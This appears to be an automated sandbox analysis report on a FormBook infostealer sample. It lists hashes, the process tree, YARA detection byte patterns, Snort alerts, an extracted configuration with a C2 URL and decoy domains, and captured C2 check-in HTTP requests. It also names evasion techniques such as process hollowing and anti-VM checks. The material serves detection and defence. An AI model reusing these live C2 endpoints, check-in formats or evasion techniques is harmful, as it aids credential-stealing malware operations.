Loading ...

Play interactive tourEdit tour

Windows Analysis Report JFBlvEr5H9

Overview

General Information

Sample Name:JFBlvEr5H9 (renamed file extension from none to exe)
Analysis ID:458762
MD5:214b1ddf045e4d6fdd73a5c8788d2adc
SHA1:8bb7c462fb649d16edb98ab526df8475a329cc71
SHA256:d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
Tags:32exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JFBlvEr5H9.exe (PID: 2036 cmdline: 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
    • JFBlvEr5H9.exe (PID: 1760 cmdline: C:\Users\user\Desktop\JFBlvEr5H9.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • mstsc.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
        • cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.JFBlvEr5H9.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.JFBlvEr5H9.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.JFBlvEr5H9.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        4.2.JFBlvEr5H9.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.JFBlvEr5H9.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFfAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: JFBlvEr5H9.exeVirustotal: Detection: 20%Perma Link
          Source: JFBlvEr5H9.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: JFBlvEr5H9.exeJoe Sandbox ML: detected
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: JFBlvEr5H9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: JFBlvEr5H9.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.pyithuhluttaw.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 03 Aug 2021 16:14:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0
          Source: JFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: JFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: JFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comda
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comion
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: JFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comn
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsivd
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn3
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnX
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnicr
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-nX
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns-m
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/B
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/0
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmpString found in binary or memory: http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
